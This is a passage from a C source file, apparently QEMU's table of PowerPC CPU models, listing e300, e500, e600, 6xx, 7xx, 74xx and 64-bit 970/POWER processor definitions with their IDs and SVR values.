"PowerPC e300c1 core") POWERPC_DEF("e300c2", CPU_POWERPC_e300c2, e300, "PowerPC e300c2 core") POWERPC_DEF("e300c3", CPU_POWERPC_e300c3, e300, "PowerPC e300c3 core") POWERPC_DEF("e300c4", CPU_POWERPC_e300c4, e300, "PowerPC e300c4 core") /* PowerPC e300 microcontrollers */ POWERPC_DEF_SVR("mpc8343", "MPC8343", CPU_POWERPC_MPC834x, POWERPC_SVR_8343, e300) POWERPC_DEF_SVR("mpc8343a", "MPC8343A", CPU_POWERPC_MPC834x, POWERPC_SVR_8343A, e300) POWERPC_DEF_SVR("mpc8343e", "MPC8343E", CPU_POWERPC_MPC834x, POWERPC_SVR_8343E, e300) POWERPC_DEF_SVR("mpc8343ea", "MPC8343EA", CPU_POWERPC_MPC834x, POWERPC_SVR_8343EA, e300) POWERPC_DEF_SVR("mpc8347t", "MPC8347T", CPU_POWERPC_MPC834x, POWERPC_SVR_8347T, e300) POWERPC_DEF_SVR("mpc8347p", "MPC8347P", CPU_POWERPC_MPC834x, POWERPC_SVR_8347P, e300) POWERPC_DEF_SVR("mpc8347at", "MPC8347AT", CPU_POWERPC_MPC834x, POWERPC_SVR_8347AT, e300) POWERPC_DEF_SVR("mpc8347ap", "MPC8347AP", CPU_POWERPC_MPC834x, POWERPC_SVR_8347AP, e300) POWERPC_DEF_SVR("mpc8347et", "MPC8347ET", CPU_POWERPC_MPC834x, POWERPC_SVR_8347ET, e300) POWERPC_DEF_SVR("mpc8347ep", "MPC8343EP", CPU_POWERPC_MPC834x, POWERPC_SVR_8347EP, e300) POWERPC_DEF_SVR("mpc8347eat", "MPC8347EAT", CPU_POWERPC_MPC834x, POWERPC_SVR_8347EAT, e300) POWERPC_DEF_SVR("mpc8347eap", "MPC8343EAP", CPU_POWERPC_MPC834x, POWERPC_SVR_8347EAP, e300) POWERPC_DEF_SVR("mpc8349", "MPC8349", CPU_POWERPC_MPC834x, POWERPC_SVR_8349, e300) POWERPC_DEF_SVR("mpc8349a", "MPC8349A", CPU_POWERPC_MPC834x, POWERPC_SVR_8349A, e300) POWERPC_DEF_SVR("mpc8349e", "MPC8349E", CPU_POWERPC_MPC834x, POWERPC_SVR_8349E, e300) POWERPC_DEF_SVR("mpc8349ea", "MPC8349EA", CPU_POWERPC_MPC834x, POWERPC_SVR_8349EA, e300) POWERPC_DEF_SVR("mpc8377", "MPC8377", CPU_POWERPC_MPC837x, POWERPC_SVR_8377, e300) POWERPC_DEF_SVR("mpc8377e", "MPC8377E", CPU_POWERPC_MPC837x, POWERPC_SVR_8377E, e300) POWERPC_DEF_SVR("mpc8378", "MPC8378", CPU_POWERPC_MPC837x, POWERPC_SVR_8378, e300) POWERPC_DEF_SVR("mpc8378e", "MPC8378E", CPU_POWERPC_MPC837x, POWERPC_SVR_8378E, e300) POWERPC_DEF_SVR("mpc8379", "MPC8379", CPU_POWERPC_MPC837x, POWERPC_SVR_8379, e300) POWERPC_DEF_SVR("mpc8379e", "MPC8379E", CPU_POWERPC_MPC837x, POWERPC_SVR_8379E, e300) /* e500 family */ POWERPC_DEF_SVR("e500_v10", "PowerPC e500 v1.0 core", CPU_POWERPC_e500v1_v10, POWERPC_SVR_E500, e500v1); POWERPC_DEF_SVR("e500_v20", "PowerPC e500 v2.0 core", CPU_POWERPC_e500v1_v20, POWERPC_SVR_E500, e500v1); POWERPC_DEF_SVR("e500v2_v10", "PowerPC e500v2 v1.0 core", CPU_POWERPC_e500v2_v10, POWERPC_SVR_E500, e500v2); POWERPC_DEF_SVR("e500v2_v20", "PowerPC e500v2 v2.0 core", CPU_POWERPC_e500v2_v20, POWERPC_SVR_E500, e500v2); POWERPC_DEF_SVR("e500v2_v21", "PowerPC e500v2 v2.1 core", CPU_POWERPC_e500v2_v21, POWERPC_SVR_E500, e500v2); POWERPC_DEF_SVR("e500v2_v22", "PowerPC e500v2 v2.2 core", CPU_POWERPC_e500v2_v22, POWERPC_SVR_E500, e500v2); POWERPC_DEF_SVR("e500v2_v30", "PowerPC e500v2 v3.0 core", CPU_POWERPC_e500v2_v30, POWERPC_SVR_E500, e500v2); POWERPC_DEF_SVR("e500mc", "e500mc", CPU_POWERPC_e500mc, POWERPC_SVR_E500, e500mc) #ifdef TARGET_PPC64 POWERPC_DEF_SVR("e5500", "e5500", CPU_POWERPC_e5500, POWERPC_SVR_E500, e5500) POWERPC_DEF_SVR("e6500", "e6500", CPU_POWERPC_e6500, POWERPC_SVR_E500, e6500) #endif /* PowerPC e500 microcontrollers */ POWERPC_DEF_SVR("mpc8533_v10", "MPC8533 v1.0", CPU_POWERPC_MPC8533_v10, POWERPC_SVR_8533_v10, e500v2) POWERPC_DEF_SVR("mpc8533_v11", "MPC8533 v1.1", CPU_POWERPC_MPC8533_v11, POWERPC_SVR_8533_v11, e500v2) POWERPC_DEF_SVR("mpc8533e_v10", "MPC8533E v1.0", CPU_POWERPC_MPC8533E_v10, POWERPC_SVR_8533E_v10, 
e500v2) POWERPC_DEF_SVR("mpc8533e_v11", "MPC8533E v1.1", CPU_POWERPC_MPC8533E_v11, POWERPC_SVR_8533E_v11, e500v2) POWERPC_DEF_SVR("mpc8540_v10", "MPC8540 v1.0", CPU_POWERPC_MPC8540_v10, POWERPC_SVR_8540_v10, e500v1) POWERPC_DEF_SVR("mpc8540_v20", "MPC8540 v2.0", CPU_POWERPC_MPC8540_v20, POWERPC_SVR_8540_v20, e500v1) POWERPC_DEF_SVR("mpc8540_v21", "MPC8540 v2.1", CPU_POWERPC_MPC8540_v21, POWERPC_SVR_8540_v21, e500v1) POWERPC_DEF_SVR("mpc8541_v10", "MPC8541 v1.0", CPU_POWERPC_MPC8541_v10, POWERPC_SVR_8541_v10, e500v1) POWERPC_DEF_SVR("mpc8541_v11", "MPC8541 v1.1", CPU_POWERPC_MPC8541_v11, POWERPC_SVR_8541_v11, e500v1) POWERPC_DEF_SVR("mpc8541e_v10", "MPC8541E v1.0", CPU_POWERPC_MPC8541E_v10, POWERPC_SVR_8541E_v10, e500v1) POWERPC_DEF_SVR("mpc8541e_v11", "MPC8541E v1.1", CPU_POWERPC_MPC8541E_v11, POWERPC_SVR_8541E_v11, e500v1) POWERPC_DEF_SVR("mpc8543_v10", "MPC8543 v1.0", CPU_POWERPC_MPC8543_v10, POWERPC_SVR_8543_v10, e500v2) POWERPC_DEF_SVR("mpc8543_v11", "MPC8543 v1.1", CPU_POWERPC_MPC8543_v11, POWERPC_SVR_8543_v11, e500v2) POWERPC_DEF_SVR("mpc8543_v20", "MPC8543 v2.0", CPU_POWERPC_MPC8543_v20, POWERPC_SVR_8543_v20, e500v2) POWERPC_DEF_SVR("mpc8543_v21", "MPC8543 v2.1", CPU_POWERPC_MPC8543_v21, POWERPC_SVR_8543_v21, e500v2) POWERPC_DEF_SVR("mpc8543e_v10", "MPC8543E v1.0", CPU_POWERPC_MPC8543E_v10, POWERPC_SVR_8543E_v10, e500v2) POWERPC_DEF_SVR("mpc8543e_v11", "MPC8543E v1.1", CPU_POWERPC_MPC8543E_v11, POWERPC_SVR_8543E_v11, e500v2) POWERPC_DEF_SVR("mpc8543e_v20", "MPC8543E v2.0", CPU_POWERPC_MPC8543E_v20, POWERPC_SVR_8543E_v20, e500v2) POWERPC_DEF_SVR("mpc8543e_v21", "MPC8543E v2.1", CPU_POWERPC_MPC8543E_v21, POWERPC_SVR_8543E_v21, e500v2) POWERPC_DEF_SVR("mpc8544_v10", "MPC8544 v1.0", CPU_POWERPC_MPC8544_v10, POWERPC_SVR_8544_v10, e500v2) POWERPC_DEF_SVR("mpc8544_v11", "MPC8544 v1.1", CPU_POWERPC_MPC8544_v11, POWERPC_SVR_8544_v11, e500v2) POWERPC_DEF_SVR("mpc8544e_v10", "MPC8544E v1.0", CPU_POWERPC_MPC8544E_v10, POWERPC_SVR_8544E_v10, e500v2) POWERPC_DEF_SVR("mpc8544e_v11", "MPC8544E v1.1", CPU_POWERPC_MPC8544E_v11, POWERPC_SVR_8544E_v11, e500v2) POWERPC_DEF_SVR("mpc8545_v20", "MPC8545 v2.0", CPU_POWERPC_MPC8545_v20, POWERPC_SVR_8545_v20, e500v2) POWERPC_DEF_SVR("mpc8545_v21", "MPC8545 v2.1", CPU_POWERPC_MPC8545_v21, POWERPC_SVR_8545_v21, e500v2) POWERPC_DEF_SVR("mpc8545e_v20", "MPC8545E v2.0", CPU_POWERPC_MPC8545E_v20, POWERPC_SVR_8545E_v20, e500v2) POWERPC_DEF_SVR("mpc8545e_v21", "MPC8545E v2.1", CPU_POWERPC_MPC8545E_v21, POWERPC_SVR_8545E_v21, e500v2) POWERPC_DEF_SVR("mpc8547e_v20", "MPC8547E v2.0", CPU_POWERPC_MPC8547E_v20, POWERPC_SVR_8547E_v20, e500v2) POWERPC_DEF_SVR("mpc8547e_v21", "MPC8547E v2.1", CPU_POWERPC_MPC8547E_v21, POWERPC_SVR_8547E_v21, e500v2) POWERPC_DEF_SVR("mpc8548_v10", "MPC8548 v1.0", CPU_POWERPC_MPC8548_v10, POWERPC_SVR_8548_v10, e500v2) POWERPC_DEF_SVR("mpc8548_v11", "MPC8548 v1.1", CPU_POWERPC_MPC8548_v11, POWERPC_SVR_8548_v11, e500v2) POWERPC_DEF_SVR("mpc8548_v20", "MPC8548 v2.0", CPU_POWERPC_MPC8548_v20, POWERPC_SVR_8548_v20, e500v2) POWERPC_DEF_SVR("mpc8548_v21", "MPC8548 v2.1", CPU_POWERPC_MPC8548_v21, POWERPC_SVR_8548_v21, e500v2) POWERPC_DEF_SVR("mpc8548e_v10", "MPC8548E v1.0", CPU_POWERPC_MPC8548E_v10, POWERPC_SVR_8548E_v10, e500v2) POWERPC_DEF_SVR("mpc8548e_v11", "MPC8548E v1.1", CPU_POWERPC_MPC8548E_v11, POWERPC_SVR_8548E_v11, e500v2) POWERPC_DEF_SVR("mpc8548e_v20", "MPC8548E v2.0", CPU_POWERPC_MPC8548E_v20, POWERPC_SVR_8548E_v20, e500v2) POWERPC_DEF_SVR("mpc8548e_v21", "MPC8548E v2.1", CPU_POWERPC_MPC8548E_v21, POWERPC_SVR_8548E_v21, e500v2) 
POWERPC_DEF_SVR("mpc8555_v10", "MPC8555 v1.0", CPU_POWERPC_MPC8555_v10, POWERPC_SVR_8555_v10, e500v2) POWERPC_DEF_SVR("mpc8555_v11", "MPC8555 v1.1", CPU_POWERPC_MPC8555_v11, POWERPC_SVR_8555_v11, e500v2) POWERPC_DEF_SVR("mpc8555e_v10", "MPC8555E v1.0", CPU_POWERPC_MPC8555E_v10, POWERPC_SVR_8555E_v10, e500v2) POWERPC_DEF_SVR("mpc8555e_v11", "MPC8555E v1.1", CPU_POWERPC_MPC8555E_v11, POWERPC_SVR_8555E_v11, e500v2) POWERPC_DEF_SVR("mpc8560_v10", "MPC8560 v1.0", CPU_POWERPC_MPC8560_v10, POWERPC_SVR_8560_v10, e500v2) POWERPC_DEF_SVR("mpc8560_v20", "MPC8560 v2.0", CPU_POWERPC_MPC8560_v20, POWERPC_SVR_8560_v20, e500v2) POWERPC_DEF_SVR("mpc8560_v21", "MPC8560 v2.1", CPU_POWERPC_MPC8560_v21, POWERPC_SVR_8560_v21, e500v2) POWERPC_DEF_SVR("mpc8567", "MPC8567", CPU_POWERPC_MPC8567, POWERPC_SVR_8567, e500v2) POWERPC_DEF_SVR("mpc8567e", "MPC8567E", CPU_POWERPC_MPC8567E, POWERPC_SVR_8567E, e500v2) POWERPC_DEF_SVR("mpc8568", "MPC8568", CPU_POWERPC_MPC8568, POWERPC_SVR_8568, e500v2) POWERPC_DEF_SVR("mpc8568e", "MPC8568E", CPU_POWERPC_MPC8568E, POWERPC_SVR_8568E, e500v2) POWERPC_DEF_SVR("mpc8572", "MPC8572", CPU_POWERPC_MPC8572, POWERPC_SVR_8572, e500v2) POWERPC_DEF_SVR("mpc8572e", "MPC8572E", CPU_POWERPC_MPC8572E, POWERPC_SVR_8572E, e500v2) /* e600 family */ POWERPC_DEF("e600", CPU_POWERPC_e600, e600, "PowerPC e600 core") /* PowerPC e600 microcontrollers */ POWERPC_DEF_SVR("mpc8610", "MPC8610", CPU_POWERPC_MPC8610, POWERPC_SVR_8610, e600) POWERPC_DEF_SVR("mpc8641", "MPC8641", CPU_POWERPC_MPC8641, POWERPC_SVR_8641, e600) POWERPC_DEF_SVR("mpc8641d", "MPC8641D", CPU_POWERPC_MPC8641D, POWERPC_SVR_8641D, e600) /* 32 bits "classic" PowerPC */ /* PowerPC 6xx family */ POWERPC_DEF("601_v0", CPU_POWERPC_601_v0, 601, "PowerPC 601v0") POWERPC_DEF("601_v1", CPU_POWERPC_601_v1, 601, "PowerPC 601v1") POWERPC_DEF("601_v2", CPU_POWERPC_601_v2, 601v, "PowerPC 601v2") POWERPC_DEF("602", CPU_POWERPC_602, 602, "PowerPC 602") POWERPC_DEF("603", CPU_POWERPC_603, 603, "PowerPC 603") POWERPC_DEF("603e_v1.1", CPU_POWERPC_603E_v11, 603E, "PowerPC 603e v1.1") POWERPC_DEF("603e_v1.2", CPU_POWERPC_603E_v12, 603E, "PowerPC 603e v1.2") POWERPC_DEF("603e_v1.3", CPU_POWERPC_603E_v13, 603E, "PowerPC 603e v1.3") POWERPC_DEF("603e_v1.4", CPU_POWERPC_603E_v14, 603E, "PowerPC 603e v1.4") POWERPC_DEF("603e_v2.2", CPU_POWERPC_603E_v22, 603E, "PowerPC 603e v2.2") POWERPC_DEF("603e_v3", CPU_POWERPC_603E_v3, 603E, "PowerPC 603e v3") POWERPC_DEF("603e_v4", CPU_POWERPC_603E_v4, 603E, "PowerPC 603e v4") POWERPC_DEF("603e_v4.1", CPU_POWERPC_603E_v41, 603E, "PowerPC 603e v4.1") POWERPC_DEF("603e7", CPU_POWERPC_603E7, 603E, "PowerPC 603e (aka PID7)") POWERPC_DEF("603e7t", CPU_POWERPC_603E7t, 603E, "PowerPC 603e7t") POWERPC_DEF("603e7v", CPU_POWERPC_603E7v, 603E, "PowerPC 603e7v") POWERPC_DEF("603e7v1", CPU_POWERPC_603E7v1, 603E, "PowerPC 603e7v1") POWERPC_DEF("603e7v2", CPU_POWERPC_603E7v2, 603E, "PowerPC 603e7v2") POWERPC_DEF("603p", CPU_POWERPC_603P, 603E, "PowerPC 603p (aka PID7v)") POWERPC_DEF("604", CPU_POWERPC_604, 604, "PowerPC 604") POWERPC_DEF("604e_v1.0", CPU_POWERPC_604E_v10, 604E, "PowerPC 604e v1.0") POWERPC_DEF("604e_v2.2", CPU_POWERPC_604E_v22, 604E, "PowerPC 604e v2.2") POWERPC_DEF("604e_v2.4", CPU_POWERPC_604E_v24, 604E, "PowerPC 604e v2.4") POWERPC_DEF("604r", CPU_POWERPC_604R, 604E, "PowerPC 604r (aka PIDA)") /* PowerPC 7xx family */ POWERPC_DEF("740_v1.0", CPU_POWERPC_7x0_v10, 740, "PowerPC 740 v1.0 (G3)") POWERPC_DEF("750_v1.0", CPU_POWERPC_7x0_v10, 750, "PowerPC 750 v1.0 (G3)") POWERPC_DEF("740_v2.0", CPU_POWERPC_7x0_v20, 740, 
"PowerPC 740 v2.0 (G3)") POWERPC_DEF("750_v2.0", CPU_POWERPC_7x0_v20, 750, "PowerPC 750 v2.0 (G3)") POWERPC_DEF("740_v2.1", CPU_POWERPC_7x0_v21, 740, "PowerPC 740 v2.1 (G3)") POWERPC_DEF("750_v2.1", CPU_POWERPC_7x0_v21, 750, "PowerPC 750 v2.1 (G3)") POWERPC_DEF("740_v2.2", CPU_POWERPC_7x0_v22, 740, "PowerPC 740 v2.2 (G3)") POWERPC_DEF("750_v2.2", CPU_POWERPC_7x0_v22, 750, "PowerPC 750 v2.2 (G3)") POWERPC_DEF("740_v3.0", CPU_POWERPC_7x0_v30, 740, "PowerPC 740 v3.0 (G3)") POWERPC_DEF("750_v3.0", CPU_POWERPC_7x0_v30, 750, "PowerPC 750 v3.0 (G3)") POWERPC_DEF("740_v3.1", CPU_POWERPC_7x0_v31, 740, "PowerPC 740 v3.1 (G3)") POWERPC_DEF("750_v3.1", CPU_POWERPC_7x0_v31, 750, "PowerPC 750 v3.1 (G3)") POWERPC_DEF("740e", CPU_POWERPC_740E, 740, "PowerPC 740E (G3)") POWERPC_DEF("750e", CPU_POWERPC_750E, 750, "PowerPC 750E (G3)") POWERPC_DEF("740p", CPU_POWERPC_7x0P, 740, "PowerPC 740P (G3)") POWERPC_DEF("750p", CPU_POWERPC_7x0P, 750, "PowerPC 750P (G3)") POWERPC_DEF("750cl_v1.0", CPU_POWERPC_750CL_v10, 750cl, "PowerPC 750CL v1.0") POWERPC_DEF("750cl_v2.0", CPU_POWERPC_750CL_v20, 750cl, "PowerPC 750CL v2.0") POWERPC_DEF("750cx_v1.0", CPU_POWERPC_750CX_v10, 750cx, "PowerPC 750CX v1.0 (G3 embedded)") POWERPC_DEF("750cx_v2.0", CPU_POWERPC_750CX_v20, 750cx, "PowerPC 750CX v2.1 (G3 embedded)") POWERPC_DEF("750cx_v2.1", CPU_POWERPC_750CX_v21, 750cx, "PowerPC 750CX v2.1 (G3 embedded)") POWERPC_DEF("750cx_v2.2", CPU_POWERPC_750CX_v22, 750cx, "PowerPC 750CX v2.2 (G3 embedded)") POWERPC_DEF("750cxe_v2.1", CPU_POWERPC_750CXE_v21, 750cx, "PowerPC 750CXe v2.1 (G3 embedded)") POWERPC_DEF("750cxe_v2.2", CPU_POWERPC_750CXE_v22, 750cx, "PowerPC 750CXe v2.2 (G3 embedded)") POWERPC_DEF("750cxe_v2.3", CPU_POWERPC_750CXE_v23, 750cx, "PowerPC 750CXe v2.3 (G3 embedded)") POWERPC_DEF("750cxe_v2.4", CPU_POWERPC_750CXE_v24, 750cx, "PowerPC 750CXe v2.4 (G3 embedded)") POWERPC_DEF("750cxe_v2.4b", CPU_POWERPC_750CXE_v24b, 750cx, "PowerPC 750CXe v2.4b (G3 embedded)") POWERPC_DEF("750cxe_v3.0", CPU_POWERPC_750CXE_v30, 750cx, "PowerPC 750CXe v3.0 (G3 embedded)") POWERPC_DEF("750cxe_v3.1", CPU_POWERPC_750CXE_v31, 750cx, "PowerPC 750CXe v3.1 (G3 embedded)") POWERPC_DEF("750cxe_v3.1b", CPU_POWERPC_750CXE_v31b, 750cx, "PowerPC 750CXe v3.1b (G3 embedded)") POWERPC_DEF("750cxr", CPU_POWERPC_750CXR, 750cx, "PowerPC 750CXr (G3 embedded)") POWERPC_DEF("750fl", CPU_POWERPC_750FL, 750fx, "PowerPC 750FL (G3 embedded)") POWERPC_DEF("750fx_v1.0", CPU_POWERPC_750FX_v10, 750fx, "PowerPC 750FX v1.0 (G3 embedded)") POWERPC_DEF("750fx_v2.0", CPU_POWERPC_750FX_v20, 750fx, "PowerPC 750FX v2.0 (G3 embedded)") POWERPC_DEF("750fx_v2.1", CPU_POWERPC_750FX_v21, 750fx, "PowerPC 750FX v2.1 (G3 embedded)") POWERPC_DEF("750fx_v2.2", CPU_POWERPC_750FX_v22, 750fx, "PowerPC 750FX v2.2 (G3 embedded)") POWERPC_DEF("750fx_v2.3", CPU_POWERPC_750FX_v23, 750fx, "PowerPC 750FX v2.3 (G3 embedded)") POWERPC_DEF("750gl", CPU_POWERPC_750GL, 750gx, "PowerPC 750GL (G3 embedded)") POWERPC_DEF("750gx_v1.0", CPU_POWERPC_750GX_v10, 750gx, "PowerPC 750GX v1.0 (G3 embedded)") POWERPC_DEF("750gx_v1.1", CPU_POWERPC_750GX_v11, 750gx, "PowerPC 750GX v1.1 (G3 embedded)") POWERPC_DEF("750gx_v1.2", CPU_POWERPC_750GX_v12, 750gx, "PowerPC 750GX v1.2 (G3 embedded)") POWERPC_DEF("750l_v2.0", CPU_POWERPC_750L_v20, 750, "PowerPC 750L v2.0 (G3 embedded)") POWERPC_DEF("750l_v2.1", CPU_POWERPC_750L_v21, 750, "PowerPC 750L v2.1 (G3 embedded)") POWERPC_DEF("750l_v2.2", CPU_POWERPC_750L_v22, 750, "PowerPC 750L v2.2 (G3 embedded)") POWERPC_DEF("750l_v3.0", CPU_POWERPC_750L_v30, 750, "PowerPC 750L v3.0 (G3 
embedded)") POWERPC_DEF("750l_v3.2", CPU_POWERPC_750L_v32, 750, "PowerPC 750L v3.2 (G3 embedded)") POWERPC_DEF("745_v1.0", CPU_POWERPC_7x5_v10, 745, "PowerPC 745 v1.0") POWERPC_DEF("755_v1.0", CPU_POWERPC_7x5_v10, 755, "PowerPC 755 v1.0") POWERPC_DEF("745_v1.1", CPU_POWERPC_7x5_v11, 745, "PowerPC 745 v1.1") POWERPC_DEF("755_v1.1", CPU_POWERPC_7x5_v11, 755, "PowerPC 755 v1.1") POWERPC_DEF("745_v2.0", CPU_POWERPC_7x5_v20, 745, "PowerPC 745 v2.0") POWERPC_DEF("755_v2.0", CPU_POWERPC_7x5_v20, 755, "PowerPC 755 v2.0") POWERPC_DEF("745_v2.1", CPU_POWERPC_7x5_v21, 745, "PowerPC 745 v2.1") POWERPC_DEF("755_v2.1", CPU_POWERPC_7x5_v21, 755, "PowerPC 755 v2.1") POWERPC_DEF("745_v2.2", CPU_POWERPC_7x5_v22, 745, "PowerPC 745 v2.2") POWERPC_DEF("755_v2.2", CPU_POWERPC_7x5_v22, 755, "PowerPC 755 v2.2") POWERPC_DEF("745_v2.3", CPU_POWERPC_7x5_v23, 745, "PowerPC 745 v2.3") POWERPC_DEF("755_v2.3", CPU_POWERPC_7x5_v23, 755, "PowerPC 755 v2.3") POWERPC_DEF("745_v2.4", CPU_POWERPC_7x5_v24, 745, "PowerPC 745 v2.4") POWERPC_DEF("755_v2.4", CPU_POWERPC_7x5_v24, 755, "PowerPC 755 v2.4") POWERPC_DEF("745_v2.5", CPU_POWERPC_7x5_v25, 745, "PowerPC 745 v2.5") POWERPC_DEF("755_v2.5", CPU_POWERPC_7x5_v25, 755, "PowerPC 755 v2.5") POWERPC_DEF("745_v2.6", CPU_POWERPC_7x5_v26, 745, "PowerPC 745 v2.6") POWERPC_DEF("755_v2.6", CPU_POWERPC_7x5_v26, 755, "PowerPC 755 v2.6") POWERPC_DEF("745_v2.7", CPU_POWERPC_7x5_v27, 745, "PowerPC 745 v2.7") POWERPC_DEF("755_v2.7", CPU_POWERPC_7x5_v27, 755, "PowerPC 755 v2.7") POWERPC_DEF("745_v2.8", CPU_POWERPC_7x5_v28, 745, "PowerPC 745 v2.8") POWERPC_DEF("755_v2.8", CPU_POWERPC_7x5_v28, 755, "PowerPC 755 v2.8") /* PowerPC 74xx family */ POWERPC_DEF("7400_v1.0", CPU_POWERPC_7400_v10, 7400, "PowerPC 7400 v1.0 (G4)") POWERPC_DEF("7400_v1.1", CPU_POWERPC_7400_v11, 7400, "PowerPC 7400 v1.1 (G4)") POWERPC_DEF("7400_v2.0", CPU_POWERPC_7400_v20, 7400, "PowerPC 7400 v2.0 (G4)") POWERPC_DEF("7400_v2.1", CPU_POWERPC_7400_v21, 7400, "PowerPC 7400 v2.1 (G4)") POWERPC_DEF("7400_v2.2", CPU_POWERPC_7400_v22, 7400, "PowerPC 7400 v2.2 (G4)") POWERPC_DEF("7400_v2.6", CPU_POWERPC_7400_v26, 7400, "PowerPC 7400 v2.6 (G4)") POWERPC_DEF("7400_v2.7", CPU_POWERPC_7400_v27, 7400, "PowerPC 7400 v2.7 (G4)") POWERPC_DEF("7400_v2.8", CPU_POWERPC_7400_v28, 7400, "PowerPC 7400 v2.8 (G4)") POWERPC_DEF("7400_v2.9", CPU_POWERPC_7400_v29, 7400, "PowerPC 7400 v2.9 (G4)") POWERPC_DEF("7410_v1.0", CPU_POWERPC_7410_v10, 7410, "PowerPC 7410 v1.0 (G4)") POWERPC_DEF("7410_v1.1", CPU_POWERPC_7410_v11, 7410, "PowerPC 7410 v1.1 (G4)") POWERPC_DEF("7410_v1.2", CPU_POWERPC_7410_v12, 7410, "PowerPC 7410 v1.2 (G4)") POWERPC_DEF("7410_v1.3", CPU_POWERPC_7410_v13, 7410, "PowerPC 7410 v1.3 (G4)") POWERPC_DEF("7410_v1.4", CPU_POWERPC_7410_v14, 7410, "PowerPC 7410 v1.4 (G4)") POWERPC_DEF("7448_v1.0", CPU_POWERPC_7448_v10, 7400, "PowerPC 7448 v1.0 (G4)") POWERPC_DEF("7448_v1.1", CPU_POWERPC_7448_v11, 7400, "PowerPC 7448 v1.1 (G4)") POWERPC_DEF("7448_v2.0", CPU_POWERPC_7448_v20, 7400, "PowerPC 7448 v2.0 (G4)") POWERPC_DEF("7448_v2.1", CPU_POWERPC_7448_v21, 7400, "PowerPC 7448 v2.1 (G4)") POWERPC_DEF("7450_v1.0", CPU_POWERPC_7450_v10, 7450, "PowerPC 7450 v1.0 (G4)") POWERPC_DEF("7450_v1.1", CPU_POWERPC_7450_v11, 7450, "PowerPC 7450 v1.1 (G4)") POWERPC_DEF("7450_v1.2", CPU_POWERPC_7450_v12, 7450, "PowerPC 7450 v1.2 (G4)") POWERPC_DEF("7450_v2.0", CPU_POWERPC_7450_v20, 7450, "PowerPC 7450 v2.0 (G4)") POWERPC_DEF("7450_v2.1", CPU_POWERPC_7450_v21, 7450, "PowerPC 7450 v2.1 (G4)") POWERPC_DEF("7441_v2.1", CPU_POWERPC_7450_v21, 7440, "PowerPC 7441 v2.1 
(G4)") POWERPC_DEF("7441_v2.3", CPU_POWERPC_74x1_v23, 7440, "PowerPC 7441 v2.3 (G4)") POWERPC_DEF("7451_v2.3", CPU_POWERPC_74x1_v23, 7450, "PowerPC 7451 v2.3 (G4)") POWERPC_DEF("7441_v2.10", CPU_POWERPC_74x1_v210, 7440, "PowerPC 7441 v2.10 (G4)") POWERPC_DEF("7451_v2.10", CPU_POWERPC_74x1_v210, 7450, "PowerPC 7451 v2.10 (G4)") POWERPC_DEF("7445_v1.0", CPU_POWERPC_74x5_v10, 7445, "PowerPC 7445 v1.0 (G4)") POWERPC_DEF("7455_v1.0", CPU_POWERPC_74x5_v10, 7455, "PowerPC 7455 v1.0 (G4)") POWERPC_DEF("7445_v2.1", CPU_POWERPC_74x5_v21, 7445, "PowerPC 7445 v2.1 (G4)") POWERPC_DEF("7455_v2.1", CPU_POWERPC_74x5_v21, 7455, "PowerPC 7455 v2.1 (G4)") POWERPC_DEF("7445_v3.2", CPU_POWERPC_74x5_v32, 7445, "PowerPC 7445 v3.2 (G4)") POWERPC_DEF("7455_v3.2", CPU_POWERPC_74x5_v32, 7455, "PowerPC 7455 v3.2 (G4)") POWERPC_DEF("7445_v3.3", CPU_POWERPC_74x5_v33, 7445, "PowerPC 7445 v3.3 (G4)") POWERPC_DEF("7455_v3.3", CPU_POWERPC_74x5_v33, 7455, "PowerPC 7455 v3.3 (G4)") POWERPC_DEF("7445_v3.4", CPU_POWERPC_74x5_v34, 7445, "PowerPC 7445 v3.4 (G4)") POWERPC_DEF("7455_v3.4", CPU_POWERPC_74x5_v34, 7455, "PowerPC 7455 v3.4 (G4)") POWERPC_DEF("7447_v1.0", CPU_POWERPC_74x7_v10, 7445, "PowerPC 7447 v1.0 (G4)") POWERPC_DEF("7457_v1.0", CPU_POWERPC_74x7_v10, 7455, "PowerPC 7457 v1.0 (G4)") POWERPC_DEF("7447_v1.1", CPU_POWERPC_74x7_v11, 7445, "PowerPC 7447 v1.1 (G4)") POWERPC_DEF("7457_v1.1", CPU_POWERPC_74x7_v11, 7455, "PowerPC 7457 v1.1 (G4)") POWERPC_DEF("7457_v1.2", CPU_POWERPC_74x7_v12, 7455, "PowerPC 7457 v1.2 (G4)") POWERPC_DEF("7447a_v1.0", CPU_POWERPC_74x7A_v10, 7445, "PowerPC 7447A v1.0 (G4)") POWERPC_DEF("7457a_v1.0", CPU_POWERPC_74x7A_v10, 7455, "PowerPC 7457A v1.0 (G4)") POWERPC_DEF("7447a_v1.1", CPU_POWERPC_74x7A_v11, 7445, "PowerPC 7447A v1.1 (G4)") POWERPC_DEF("7457a_v1.1", CPU_POWERPC_74x7A_v11, 7455, "PowerPC 7457A v1.1 (G4)") POWERPC_DEF("7447a_v1.2", CPU_POWERPC_74x7A_v12, 7445, "PowerPC 7447A v1.2 (G4)") POWERPC_DEF("7457a_v1.2", CPU_POWERPC_74x7A_v12, 7455, "PowerPC 7457A v1.2 (G4)") /* 64 bits PowerPC */ #if defined(TARGET_PPC64) POWERPC_DEF("970_v2.2", CPU_POWERPC_970_v22, 970, "PowerPC 970 v2.2") POWERPC_DEF("970fx_v1.0", CPU_POWERPC_970FX_v10, 970, "PowerPC 970FX v1.0 (G5)") POWERPC_DEF("970fx_v2.0", CPU_POWERPC_970FX_v20, 970, "PowerPC 970FX v2.0 (G5)") POWERPC_DEF("970fx_v2.1", CPU_POWERPC_970FX_v21, 970, "PowerPC 970FX v2.1 (G5)") POWERPC_DEF("970fx_v3.0", CPU_POWERPC_970FX_v30, 970, "PowerPC 970FX v3.0 (G5)") POWERPC_DEF("970fx_v3.1", CPU_POWERPC_970FX_v31, 970, "PowerPC 970FX v3.1 (G5)") POWERPC_DEF("970mp_v1.0", CPU_POWERPC_970MP_v10, 970, "PowerPC 970MP v1.0") POWERPC_DEF("970mp_v1.1", CPU_POWERPC_970MP_v11, 970, "PowerPC 970MP v1.1") POWERPC_DEF("power5+_v2.1", CPU_POWERPC_POWER5P_v21, POWER5P, "POWER5+ v2.1") POWERPC_DEF("power7_v2.3", CPU_POWERPC_POWER7_v23, POWER7, "POWER7 v2.3") POWERPC_DEF("power7+_v2.1", CPU_POWERPC_POWER7P_v21, POWER7, "POWER7+ v2.1") POWERPC_DEF("power8e_v2.1", CPU_POWERPC_POWER8E_v21, POWER8, "POWER8E v2.1") POWERPC_DEF("power8_v2.0", CPU_POWERPC_POWER8_v20, POWER8, "POWER8 v2.0") POWERPC_DEF("power8nvl_v1.0", 